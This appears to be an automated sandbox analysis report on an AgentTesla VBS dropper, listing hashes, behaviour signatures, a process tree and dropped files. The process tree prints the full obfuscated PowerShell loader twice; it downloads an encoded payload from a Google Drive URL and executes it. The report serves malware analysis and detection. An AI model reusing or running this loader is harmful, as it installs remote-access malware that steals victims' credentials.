Analysis

  • max time kernel
    144s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-06-2024 14:49

General

  • Target

    03cbdd488fd6819ccfafa38dedf10ab4db2e9d447e69ee89f539255941ad511d.vbs

  • Size

    92KB

  • MD5

    1a0f278542c1a82b36d2a9339c44343f

  • SHA1

    7464df5fb5eae9f2bb2de37aac91729be222c801

  • SHA256

    03cbdd488fd6819ccfafa38dedf10ab4db2e9d447e69ee89f539255941ad511d

  • SHA512

    4e3e255185ffe407661cd5f6ef18aceaf39e4b7410926e14c2580fe9ba7a5ba3edbdf5834c03eec9662ab6b111da262ba5f8632e3304766eb99f42a60eb62ec6

  • SSDEEP

    1536:w01/LsA0DnkdzhX7RXaSMmr2rFHxsASgxWxCwhrdM5R/:w09LB0DnWzhX7RXaSMxhxsAhWEwhrdMT

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Blocklisted process makes network request 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\03cbdd488fd6819ccfafa38dedf10ab4db2e9d447e69ee89f539255941ad511d.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4156
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -windowstyle 1 "cls;$Enchisel = 1;$Skvt='ring';$Procreativity218='S';Function Tvivlesyg($tablehopped){$Strangulates=$tablehopped.Length-$Enchisel;$Stiksaars=$Procreativity218+'ubst'+$Skvt;For( $vaporisers=7;$vaporisers -lt $Strangulates;$vaporisers+=8){$Donnie+=$tablehopped.$Stiksaars.Invoke( $vaporisers, $Enchisel);}$Donnie;}function Oversway($Ynglestedernes){ . ($Hjemsgelse) ($Ynglestedernes);}$Tiplet=Tvivlesyg ' Sed.elMStershaoDidymisz Hurry.i AkvarilSy heeklinextr a unolog/Prisonf5Ioniser.Sultana0Plateau Topa,ol( PrinteWleukophiYdmygstnGldelsedkomediaoEndel,gw Mercedsblokker ,tabstaN Strst T Pr pre Grometr1 Perine0Brtsejl.Ukrnkel0Aa nend;cinquef A,venarWUndis,oi Impa.snra,gedn6i citat4Fundame;Unidyll E.ilicsx Antise6Sekunde4Furcife; Im,alm DramatirUnirascv L,erst:Program1Scattie2P.imrko1Rabbitl. Tampon0Serjean)Lgetsob Pesh.toGkontr leCantatoc bucibak.ncrankoEndoper/ Ophtha2Unossif0Plastom1Nulpunk0Ne vebu0Fulth,r1 Handma0Reformp1Beachhe GuldaldFKudizeoiUdgrfter rlenate,uccinifAciculuoaglipayxLnindeh/Resgues1avancem2Optaell1Startel.Forspil0Latente ';$Leucadendron=Tvivlesyg ' Au,optUAppeases .kkemoe,lankearT,aditi-NarcissAGiordang eje,doeSal.antn Kdva,etRefl ks ';$Enhardy=Tvivlesyg ' LaborahTri,ngut HjlpeptDriftsipGaleasesSvingta:Con lob/Subtaxo/vebgernd LairmerfremmeliKv.ddervInksta e ma,rop. Pr gragSmalskuo AdjudaoKlipning.loreatlBeseecheHaspnin.Autogencambulato Rentenm Unhurr/Daoinesu Samme.cEn iche?Paaskese Ko,sulxliflighpanhuggeo IdemanrChieft tRestbal=stoffrid Po.byco Rep,riwpa sionn Jeopa,lGalapagoBum.assaMessi.gdAldocoo&Gnidni.iKo.dnindOverdoz=F,ntina1Chassep_SceneriNExaratiXRisikobtComptinWCrappi L,ntipudoHvedemewIndoktrEDermatrLJoker eOT.rnebr3Adiat eAMentaluw Adminil,emalsnTRemolliGIm.atieXSuppl m2.raktatJ SeminaRbob,nerPOtoplasLIn.rejsdAdderesc JennetR Lyk,es1Reentraa.rstninXasnerscE HemidaRInvpegaJPaatage ';$Eigenvalues=Tvivlesyg ' gump.i>Fo.blff ';$Hjemsgelse=Tvivlesyg 'Arbejd.iAdjoin.eproduk x Skn.it ';$Stadselige='Bkkenbenets';$Woodspite = Tvivlesyg 'FlseneseBordskacKalciumhYclepedoKrystal Clurica%CosuretaCaveaeppmeningspBirdbatd DratteaKjllertt GelatiaTele.on%.odulud\OverhalSS,burbacNonscierFlaskeaoLokalavu,eathergUndersteKartone.Skraa eSBesin ewFjer,gtiSibbss. urbopr&Narcoti&Overmen Mongrele Aalbe.cQerssheh Skolelo Postlu sarco,otIndices ';Oversway (Tvivlesyg 'Trevang$Kighullg.ykologlKneepieoCon.umabTreeshiau,womanlOverbas: fagemeAOutpassfs.mbionfFa.tiglyFricatirInters,iFodboldnBebopp,gPeroliasLectorsr W.xinga Pr,ssimLangtrupPullulaeTeltligrAfpri,ns Kumysb=Sacchar( Eniguac aarg nmMangonedLaurasp Re.ogni/Teemingc D.ainl Smreri$Sho esfWPhrenoloUdkasteo Hypodidkropsvis fe.ledpSurfboaiUdgivelt Unboxee,allele)Avarit. ');Oversway (Tvivlesyg 'For,tag$girondeg F eratlTyvst,loHydrosebP.steuraR,ddersl Napole:SnderjyS .ommany Fordums KommistMonarkieUrigtigmAnte ebuTil,ager D utereKanoniss Tele n= Greesa$UnreplaE,tundern StillfhSurretoaGrac,lurSentimedSubgrapyParoemi. SkaktesU,municpSl,venel DispeoiSlakytetFos erh(Tmmermn$ CamphiENondea,iTrvejorg Denns,equidd enFelixspvBrudeudaFemtenalElleve.u trypsieGenkaldsPhiloso)Baarebu ');Oversway (Tvivlesyg 'special[OmodyniNCymricjeVilligstSvejsef.KvittepS UndeteeSta,darrUfordjevSup osaiRep imecTouchileVegetarP Hen,edoDechifriInterrunof entltInkenbuMNit,ogeaSorrywanLi,jesta Hipp,pgOrganise.xtradurrevolub]Plenumd: Subdue:ChannelSEanmisdeO.ersigcVgkon,auB,ttermrChoryzai,anhapitYngle.tycephaloPfoelgevrconcilio NonpertTrickiloOver,nccUnpenneo DrikkelSsonfor Ka ital= Iagtta Knebler[OparbejNnicolinebesmreltMellem,.overwovSTandemmeNominalcUnderglurodekasrTherma iBugcerttCr ftmayTemplesPButchesrRekogn.oBa,dendtEuascomoSystolicNichisroT.pehuslApodedeTFlugte.yAb,nnemp FiskeaeRemplac]Superex:Asexual:Mill,reT Emydinl,ryptodsCo,nect1Birkies2Pectina ');$Enhardy=$Systemures[0];$Hypokinetic= (Tvivlesyg 'Disk ej$Stt.epigHentydelFrak aloCochoncbErklrinaGlanspelAmylops:CecilsuMSubstanaCytostolDod eraiImper agMalars,nMelasseeGondr crAfs reds Konfig=TromsteN pottyseSor,seswKullagr- kmacroO FecalcbfaunernjFoder,ee,lonrevc M,ologt Oppo,i SunnsuStegneomy irenssA bejdstcoxorane AdminimDimers,. DiskofNRumak seLi.leskt veget .AprildaWAffronteMult.cibPass.viCVipstjelbegrebsiembou heZygomycn Bitbltt');$Hypokinetic+=$Affyringsrampers[1];Oversway ($Hypokinetic);Oversway (Tvivlesyg 'Cuisi,i$ SpindeMOnondaga DisketlRepavedi SyltetgObjectinW.lburte MemorarGastronsUndervi. FlocciH Kekchie A,toniaKppetordudho.deediatomar Strik,s Fa,tsa[Outyiel$TransskLIncur aeTropekluSmaaligcForhuseaSymp omd.rosaekeHustruenGoldenwdDistrahrProstatoyaroviznv ffelj]Syneriz=Overdra$SolicitTAnoeticij panvgpCapriccl MangeseForretntGrillst ');$Nonadjudicated=Tvivlesyg 'Agrom z$Ent popMFornaglaCycliselDescriai ConvengFastsaenpuckableUdbytterpreentes pfenni.magthavDEnaarinoIcterinwNotabiln He erolProduktoconspicaPana.ead,ubjectF eprousi avigel blgetrem,terin( Slutor$ AntiksE Photodn Stolpehtr.ssmaadiarkterMaharandUddeligyFrandse,.orklar$Blles.mO La.roioRainproc CitolayIrresonsMultivetKib ages G.stro)Ineff.r ';$Oocysts=$Affyringsrampers[0];Oversway (Tvivlesyg ' hirten$ FestligAdia.helAfbrksboVaterlibParaciuaOwllikel Boobie:Krim,krB Accouna bedsp,bImpingebTingfstlTonsilleDampdredReautho=Indeksa( NationTWaistcoeCubo des OvillutTirsdag- holismPOpmrksoaBrasnentStboldehMuskula Trusser$ForedesOContagioPerora.cFejteneyImdegaas Knifeptal.rmersu.fritn)udmugni ');while (!$Babbled) {Oversway (Tvivlesyg ' Fritlb$rv nessgUd,ortelDiskeseoSaxofonbHormoniaPreaddil Grns.f:tilregnM SlibesiBestiklcEldrev,rReassa.oGryntencDukkerthTi bageiKlatch,rCannonboSvitserpFjorte,tTrefoileRoo,aanrDatam.taSolvemenM dgaae=Piskefl$Uhin,retIllegalr Dekantu efraine Unname ') ;Oversway $Nonadjudicated;Oversway (Tvivlesyg 'D.celerSAlienatt irdleaBismethr Arb.ritSa.sons-SkemabuSK,astralAtticise elatineManifesp hunden patined4Vagnarb ');Oversway (Tvivlesyg 'Oligosy$FeifrefgSalgsvalAwe,lyioNonecumbOpgiveta BuckeylHydroae:Stear nBMerudgia Penetrb Fiskesbbureaucl Forttse Idiomedtrykfje=myxop.y(MalaromTHofjg.reUnprodesv,lkomst Deling-DyrepenPPoliovaapseudobtLitote h ensket Caddien$ An.ilsONonlarcoFlageolcGeophagy unparosSyvkantt Deft.ysMo oriz)Easies ') ;Oversway (Tvivlesyg 'Bio oci$StdpudegPimperilInsubduoStegebob.iruettaMilieutlHyp chr:Rig.andHDi ownayForpaknb HuslejaAnlg.panHiredsqt Fri.kehNerveliu GodvilsSawsmit=Central$S.rumalgTe sturlLimousio.adedlyb Selv,vaCoccololDyrenav: Huks,eGLavad laHewettil Def.ktl Regnspe.ryntprrManualeeGenstarnNimblewsSprregr2 Anti,i0Repe,ce4Isogona+Jul,aft+Cirklel%Torisnu$Soap laS Vicenty PulpstsTrimerit GennemeHuffilymB otheruPotentirCervicoeCyrillis Pr.imb.NoncalccSpaltepoVenten,uKrops.inRadi,let.midazo ') ;$Enhardy=$Systemures[$Hybanthus];}$Krigsfangers=349622;$Countermands=30457;Oversway (Tvivlesyg 'Monof a$Deu,schgUpharsil M.sedioFirlotbbTrngslea mpshemlStilett:skienssDSmallhoeKontr.lr Tudl,keUnbellilRantmuciKa ayafc Faste,tIndentusFormumn Lugsome= Indfoe EtageadGJededi eTrassertFe,iesy- LgformC ChequeoLytforvn Tr erstRecent.eUsaglignChessart bivoks Lyctida$ MetodiOBlousesoRivindfcprotegeyDisagresdromaeotEvidenssF.nansl ');Oversway (Tvivlesyg 'Pens,on$SkglavegLumenallSparekao R,glanb mellemaFrekvenlOverres:Brandmes Hy.ogenLuxembuaDybstrupCevichesAllove eAlexandtU,frsleiho agognSlvstolg SkjteseUnsamplt SmeltnsUmaleta T.xamet=Vaabenh Resorpt[ RibbonS,lkekarySkuddensB,ttinatsukkeute Supposm Combur. owbaneCOutdwelo Paillen PishogvUnbittie Au,oblrextrasctUnraile] Okse.u:Lyk,eop:DypningF LigedarRet.rdioFyge,anmExaminiBNereideata aceasAcajoubeGaldest6Dilata 4SildebeSSkjtendtillusiorTil.oldi Recursn PantstgMocking(Cabotin$NstmindD BlumineSpeditirWaddi.reStud relSelvforisprangscUdvirknt Semicosour,bie)Copepod ');Oversway (Tvivlesyg 'Dugperl$s,omatogFinhvallBivuakeoBli sedb Yobbo.aU listnlStrmmen: OpkrvnE PoleaxtU,elikah Platyro Chl rixAerodyniCook aseCunjergs Amaret1Citr.ll1Epoxyla9Skomage Depermi=konjunk Fyrr.tr[temp raSMejslinyTridimes ookhot ScenogedisgrosmHje meh. AerobaTfarvemee ReratexSystemptSjleso.. eltmarETartufinKursliscPalatoroBrushpodtredjegiGlyptotnGartnerg Presol] Gr ofx: Trying: TilthsALiddenfSTrellisCKkkenboIDaakalvIWhitesi. AnchisGSoftbale un,ramtCompartS KongretKrage.orSlaggedi OverponRullersgF shmou(outland$Tildigts PrevienForsknia Ra.finpkulbuelsDalstrgeHyperdit AerostiSubdepanHopefulg,ladderehemicyctEro.ogesBize.ma)P.rsone ');Oversway (Tvivlesyg 'Hypercy$Varpet.g,wiftenlLegatesoR ggersb,urisdiaNaturlolrocke s:StyringS PostichAftopnioMangilyvTrowabliMoskusknSubethfgNatbord=Theater$StichosEEkspo,etFysiurghbukse,noAloysiaxLemperui T gneseV.ndudssLushnes1 Brneli1Karenst9Purlgse.RetropesMilvusiuDubietibAntikvasFlappert BodhisrBrugskuiSalgsstn Coventg Dressm(Jernfor$ FintmaKP,leogerStrkni.i KrlgtegNonpenasRevendffTak,eska Cathetn F.ldepgLindedeeBesparerVerdenssVin,ues,Konkre,$ BespirCPosteroo SpegepuRaaglasnKarbonatSluddere Platear.nefuldm.anacetaForsty.nSoarer dSkriftesUnrem,t) A,hron ');Oversway $Shoving;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4612
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scrouge.Swi && echo t"
        3⤵
          PID:4772
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;$Enchisel = 1;$Skvt='ring';$Procreativity218='S';Function Tvivlesyg($tablehopped){$Strangulates=$tablehopped.Length-$Enchisel;$Stiksaars=$Procreativity218+'ubst'+$Skvt;For( $vaporisers=7;$vaporisers -lt $Strangulates;$vaporisers+=8){$Donnie+=$tablehopped.$Stiksaars.Invoke( $vaporisers, $Enchisel);}$Donnie;}function Oversway($Ynglestedernes){ . ($Hjemsgelse) ($Ynglestedernes);}$Tiplet=Tvivlesyg ' Sed.elMStershaoDidymisz Hurry.i AkvarilSy heeklinextr a unolog/Prisonf5Ioniser.Sultana0Plateau Topa,ol( PrinteWleukophiYdmygstnGldelsedkomediaoEndel,gw Mercedsblokker ,tabstaN Strst T Pr pre Grometr1 Perine0Brtsejl.Ukrnkel0Aa nend;cinquef A,venarWUndis,oi Impa.snra,gedn6i citat4Fundame;Unidyll E.ilicsx Antise6Sekunde4Furcife; Im,alm DramatirUnirascv L,erst:Program1Scattie2P.imrko1Rabbitl. Tampon0Serjean)Lgetsob Pesh.toGkontr leCantatoc bucibak.ncrankoEndoper/ Ophtha2Unossif0Plastom1Nulpunk0Ne vebu0Fulth,r1 Handma0Reformp1Beachhe GuldaldFKudizeoiUdgrfter rlenate,uccinifAciculuoaglipayxLnindeh/Resgues1avancem2Optaell1Startel.Forspil0Latente ';$Leucadendron=Tvivlesyg ' Au,optUAppeases .kkemoe,lankearT,aditi-NarcissAGiordang eje,doeSal.antn Kdva,etRefl ks ';$Enhardy=Tvivlesyg ' LaborahTri,ngut HjlpeptDriftsipGaleasesSvingta:Con lob/Subtaxo/vebgernd LairmerfremmeliKv.ddervInksta e ma,rop. Pr gragSmalskuo AdjudaoKlipning.loreatlBeseecheHaspnin.Autogencambulato Rentenm Unhurr/Daoinesu Samme.cEn iche?Paaskese Ko,sulxliflighpanhuggeo IdemanrChieft tRestbal=stoffrid Po.byco Rep,riwpa sionn Jeopa,lGalapagoBum.assaMessi.gdAldocoo&Gnidni.iKo.dnindOverdoz=F,ntina1Chassep_SceneriNExaratiXRisikobtComptinWCrappi L,ntipudoHvedemewIndoktrEDermatrLJoker eOT.rnebr3Adiat eAMentaluw Adminil,emalsnTRemolliGIm.atieXSuppl m2.raktatJ SeminaRbob,nerPOtoplasLIn.rejsdAdderesc JennetR Lyk,es1Reentraa.rstninXasnerscE HemidaRInvpegaJPaatage ';$Eigenvalues=Tvivlesyg ' gump.i>Fo.blff ';$Hjemsgelse=Tvivlesyg 'Arbejd.iAdjoin.eproduk x Skn.it ';$Stadselige='Bkkenbenets';$Woodspite = Tvivlesyg 'FlseneseBordskacKalciumhYclepedoKrystal Clurica%CosuretaCaveaeppmeningspBirdbatd DratteaKjllertt GelatiaTele.on%.odulud\OverhalSS,burbacNonscierFlaskeaoLokalavu,eathergUndersteKartone.Skraa eSBesin ewFjer,gtiSibbss. urbopr&Narcoti&Overmen Mongrele Aalbe.cQerssheh Skolelo Postlu sarco,otIndices ';Oversway (Tvivlesyg 'Trevang$Kighullg.ykologlKneepieoCon.umabTreeshiau,womanlOverbas: fagemeAOutpassfs.mbionfFa.tiglyFricatirInters,iFodboldnBebopp,gPeroliasLectorsr W.xinga Pr,ssimLangtrupPullulaeTeltligrAfpri,ns Kumysb=Sacchar( Eniguac aarg nmMangonedLaurasp Re.ogni/Teemingc D.ainl Smreri$Sho esfWPhrenoloUdkasteo Hypodidkropsvis fe.ledpSurfboaiUdgivelt Unboxee,allele)Avarit. ');Oversway (Tvivlesyg 'For,tag$girondeg F eratlTyvst,loHydrosebP.steuraR,ddersl Napole:SnderjyS .ommany Fordums KommistMonarkieUrigtigmAnte ebuTil,ager D utereKanoniss Tele n= Greesa$UnreplaE,tundern StillfhSurretoaGrac,lurSentimedSubgrapyParoemi. SkaktesU,municpSl,venel DispeoiSlakytetFos erh(Tmmermn$ CamphiENondea,iTrvejorg Denns,equidd enFelixspvBrudeudaFemtenalElleve.u trypsieGenkaldsPhiloso)Baarebu ');Oversway (Tvivlesyg 'special[OmodyniNCymricjeVilligstSvejsef.KvittepS UndeteeSta,darrUfordjevSup osaiRep imecTouchileVegetarP Hen,edoDechifriInterrunof entltInkenbuMNit,ogeaSorrywanLi,jesta Hipp,pgOrganise.xtradurrevolub]Plenumd: Subdue:ChannelSEanmisdeO.ersigcVgkon,auB,ttermrChoryzai,anhapitYngle.tycephaloPfoelgevrconcilio NonpertTrickiloOver,nccUnpenneo DrikkelSsonfor Ka ital= Iagtta Knebler[OparbejNnicolinebesmreltMellem,.overwovSTandemmeNominalcUnderglurodekasrTherma iBugcerttCr ftmayTemplesPButchesrRekogn.oBa,dendtEuascomoSystolicNichisroT.pehuslApodedeTFlugte.yAb,nnemp FiskeaeRemplac]Superex:Asexual:Mill,reT Emydinl,ryptodsCo,nect1Birkies2Pectina ');$Enhardy=$Systemures[0];$Hypokinetic= (Tvivlesyg 'Disk ej$Stt.epigHentydelFrak aloCochoncbErklrinaGlanspelAmylops:CecilsuMSubstanaCytostolDod eraiImper agMalars,nMelasseeGondr crAfs reds Konfig=TromsteN pottyseSor,seswKullagr- kmacroO FecalcbfaunernjFoder,ee,lonrevc M,ologt Oppo,i SunnsuStegneomy irenssA bejdstcoxorane AdminimDimers,. DiskofNRumak seLi.leskt veget .AprildaWAffronteMult.cibPass.viCVipstjelbegrebsiembou heZygomycn Bitbltt');$Hypokinetic+=$Affyringsrampers[1];Oversway ($Hypokinetic);Oversway (Tvivlesyg 'Cuisi,i$ SpindeMOnondaga DisketlRepavedi SyltetgObjectinW.lburte MemorarGastronsUndervi. FlocciH Kekchie A,toniaKppetordudho.deediatomar Strik,s Fa,tsa[Outyiel$TransskLIncur aeTropekluSmaaligcForhuseaSymp omd.rosaekeHustruenGoldenwdDistrahrProstatoyaroviznv ffelj]Syneriz=Overdra$SolicitTAnoeticij panvgpCapriccl MangeseForretntGrillst ');$Nonadjudicated=Tvivlesyg 'Agrom z$Ent popMFornaglaCycliselDescriai ConvengFastsaenpuckableUdbytterpreentes pfenni.magthavDEnaarinoIcterinwNotabiln He erolProduktoconspicaPana.ead,ubjectF eprousi avigel blgetrem,terin( Slutor$ AntiksE Photodn Stolpehtr.ssmaadiarkterMaharandUddeligyFrandse,.orklar$Blles.mO La.roioRainproc CitolayIrresonsMultivetKib ages G.stro)Ineff.r ';$Oocysts=$Affyringsrampers[0];Oversway (Tvivlesyg ' hirten$ FestligAdia.helAfbrksboVaterlibParaciuaOwllikel Boobie:Krim,krB Accouna bedsp,bImpingebTingfstlTonsilleDampdredReautho=Indeksa( NationTWaistcoeCubo des OvillutTirsdag- holismPOpmrksoaBrasnentStboldehMuskula Trusser$ForedesOContagioPerora.cFejteneyImdegaas Knifeptal.rmersu.fritn)udmugni ');while (!$Babbled) {Oversway (Tvivlesyg ' Fritlb$rv nessgUd,ortelDiskeseoSaxofonbHormoniaPreaddil Grns.f:tilregnM SlibesiBestiklcEldrev,rReassa.oGryntencDukkerthTi bageiKlatch,rCannonboSvitserpFjorte,tTrefoileRoo,aanrDatam.taSolvemenM dgaae=Piskefl$Uhin,retIllegalr Dekantu efraine Unname ') ;Oversway $Nonadjudicated;Oversway (Tvivlesyg 'D.celerSAlienatt irdleaBismethr Arb.ritSa.sons-SkemabuSK,astralAtticise elatineManifesp hunden patined4Vagnarb ');Oversway (Tvivlesyg 'Oligosy$FeifrefgSalgsvalAwe,lyioNonecumbOpgiveta BuckeylHydroae:Stear nBMerudgia Penetrb Fiskesbbureaucl Forttse Idiomedtrykfje=myxop.y(MalaromTHofjg.reUnprodesv,lkomst Deling-DyrepenPPoliovaapseudobtLitote h ensket Caddien$ An.ilsONonlarcoFlageolcGeophagy unparosSyvkantt Deft.ysMo oriz)Easies ') ;Oversway (Tvivlesyg 'Bio oci$StdpudegPimperilInsubduoStegebob.iruettaMilieutlHyp chr:Rig.andHDi ownayForpaknb HuslejaAnlg.panHiredsqt Fri.kehNerveliu GodvilsSawsmit=Central$S.rumalgTe sturlLimousio.adedlyb Selv,vaCoccololDyrenav: Huks,eGLavad laHewettil Def.ktl Regnspe.ryntprrManualeeGenstarnNimblewsSprregr2 Anti,i0Repe,ce4Isogona+Jul,aft+Cirklel%Torisnu$Soap laS Vicenty PulpstsTrimerit GennemeHuffilymB otheruPotentirCervicoeCyrillis Pr.imb.NoncalccSpaltepoVenten,uKrops.inRadi,let.midazo ') ;$Enhardy=$Systemures[$Hybanthus];}$Krigsfangers=349622;$Countermands=30457;Oversway (Tvivlesyg 'Monof a$Deu,schgUpharsil M.sedioFirlotbbTrngslea mpshemlStilett:skienssDSmallhoeKontr.lr Tudl,keUnbellilRantmuciKa ayafc Faste,tIndentusFormumn Lugsome= Indfoe EtageadGJededi eTrassertFe,iesy- LgformC ChequeoLytforvn Tr erstRecent.eUsaglignChessart bivoks Lyctida$ MetodiOBlousesoRivindfcprotegeyDisagresdromaeotEvidenssF.nansl ');Oversway (Tvivlesyg 'Pens,on$SkglavegLumenallSparekao R,glanb mellemaFrekvenlOverres:Brandmes Hy.ogenLuxembuaDybstrupCevichesAllove eAlexandtU,frsleiho agognSlvstolg SkjteseUnsamplt SmeltnsUmaleta T.xamet=Vaabenh Resorpt[ RibbonS,lkekarySkuddensB,ttinatsukkeute Supposm Combur. owbaneCOutdwelo Paillen PishogvUnbittie Au,oblrextrasctUnraile] Okse.u:Lyk,eop:DypningF LigedarRet.rdioFyge,anmExaminiBNereideata aceasAcajoubeGaldest6Dilata 4SildebeSSkjtendtillusiorTil.oldi Recursn PantstgMocking(Cabotin$NstmindD BlumineSpeditirWaddi.reStud relSelvforisprangscUdvirknt Semicosour,bie)Copepod ');Oversway (Tvivlesyg 'Dugperl$s,omatogFinhvallBivuakeoBli sedb Yobbo.aU listnlStrmmen: OpkrvnE PoleaxtU,elikah Platyro Chl rixAerodyniCook aseCunjergs Amaret1Citr.ll1Epoxyla9Skomage Depermi=konjunk Fyrr.tr[temp raSMejslinyTridimes ookhot ScenogedisgrosmHje meh. AerobaTfarvemee ReratexSystemptSjleso.. eltmarETartufinKursliscPalatoroBrushpodtredjegiGlyptotnGartnerg Presol] Gr ofx: Trying: TilthsALiddenfSTrellisCKkkenboIDaakalvIWhitesi. AnchisGSoftbale un,ramtCompartS KongretKrage.orSlaggedi OverponRullersgF shmou(outland$Tildigts PrevienForsknia Ra.finpkulbuelsDalstrgeHyperdit AerostiSubdepanHopefulg,ladderehemicyctEro.ogesBize.ma)P.rsone ');Oversway (Tvivlesyg 'Hypercy$Varpet.g,wiftenlLegatesoR ggersb,urisdiaNaturlolrocke s:StyringS PostichAftopnioMangilyvTrowabliMoskusknSubethfgNatbord=Theater$StichosEEkspo,etFysiurghbukse,noAloysiaxLemperui T gneseV.ndudssLushnes1 Brneli1Karenst9Purlgse.RetropesMilvusiuDubietibAntikvasFlappert BodhisrBrugskuiSalgsstn Coventg Dressm(Jernfor$ FintmaKP,leogerStrkni.i KrlgtegNonpenasRevendffTak,eska Cathetn F.ldepgLindedeeBesparerVerdenssVin,ues,Konkre,$ BespirCPosteroo SpegepuRaaglasnKarbonatSluddere Platear.nefuldm.anacetaForsty.nSoarer dSkriftesUnrem,t) A,hron ');Oversway $Shoving;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3632
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scrouge.Swi && echo t"
            4⤵
              PID:3956
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2992
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=752 --field-trial-handle=2264,i,15001568551143786084,90255922961447677,262144 --variations-seed-version /prefetch:8
        1⤵
          PID:2172

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

          Filesize

          3KB

          MD5

          932bb90d0770b73ad24dda9174ced743

          SHA1

          f2d7323b5d3f2978fb30f7b9b026497d968dac13

          SHA256

          549edc4d8c1f25c916f19b68f412ca4957d6191503dfce38c96f49b2a1d3d37b

          SHA512

          c7846774f118add3458fced652bc94d3527342415c10dc1a731413e6d94b22fbc3115d5eda4236523a221f450586dbedf29f7751a9e8e2655861f21d0653f3d1

        • C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

          Filesize

          565B

          MD5

          efff69aad6f8946d6499b060b419aa81

          SHA1

          530aa1bdae43c5f072c115b2fe91961538b60640

          SHA256

          6bd5f8250d34b23ed5c512f9c999e035b6c1d225d285ffa04633000ccac9d0a2

          SHA512

          2fd66e4bdc2286a58b4bb5f5f7f57983f65054512fad479d216f11abc7e64c22f797e7bf89368e12dfbc732068f084e297d443f3dee228c83826c4d9c088413e

        • C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

          Filesize

          3KB

          MD5

          faad7bea993e46e2b93131dc5960cd02

          SHA1

          15b1a22cd47fd97d7de73275a628d81701a08fd4

          SHA256

          208c825c646d1cf301fd03495601599ad7937f2ff14c9172f361ac9ffc15ec1c

          SHA512

          c4d59712b52f7731692d78991a9d206c9bfac628eedbfd38ec05e0d055d09918580f1ccfbaaf98f2af6e81f2e4ced626d309fa2d3fb6b3cc832533674f0652d5

        • C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

          Filesize

          4KB

          MD5

          161ff62ce2710bf06c99035ae4493e0f

          SHA1

          76beb1725177edccce02ca2e9d7a1ebeacd2d99c

          SHA256

          d302e208e205fd7b08bd0844e787f15dec1fecd4f6e6056104a64f1105e32e4d

          SHA512

          135228bbf7cea08b76bc288335e1699828a642cd6b81761bba33ed5a40c28632b25cf8f8664fbf4ee2d21b573d1cda066614250054002c8bf4bda869389d03a6

        • C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

          Filesize

          1KB

          MD5

          b7874067dccb9132ddf6a88979ae2c18

          SHA1

          cb1065a2c0aa83bf9f136ed2ebfe4b68c52c9bf7

          SHA256

          ee6e201490ad62b76126e8ac505b524dfaa1a84f95e69a15638f5e868637101d

          SHA512

          c75128b9ae12129ab05e616cc3f57da66eaff1d1513d9d8efc163bd17b531bdc7ca2ecbd3255d9d7ac4d58b784117474a9e8ee7f9dff73d33345d9be7579bf18

        • C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

          Filesize

          1KB

          MD5

          a43144af0795d03343f43e5ddb4d0c08

          SHA1

          4375286a3bee1476b2e088fd49a1c7ad6fb81f07

          SHA256

          d3a5f44858e125f2e25444faf014f354318ac8b6a697c82a8b02d72dab4185d3

          SHA512

          8bbc5f40c35aa2ee157d4ec52c9ad76d58a9434650e801c90b08b0ef0a046db23a5cdc6f1d640c11edb65baac4300491509ec850dc9260f74612d4a8b6c79ab3

        • C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

          Filesize

          180B

          MD5

          5268416cacbeffd708e75a64a1cb2036

          SHA1

          50d9ad3cefa4b430903e7f1e527c3995b0ee3f7f

          SHA256

          7926f95348277654cbae2c84a5562a003fd308245e5a2d9a031bba7bd0d0c736

          SHA512

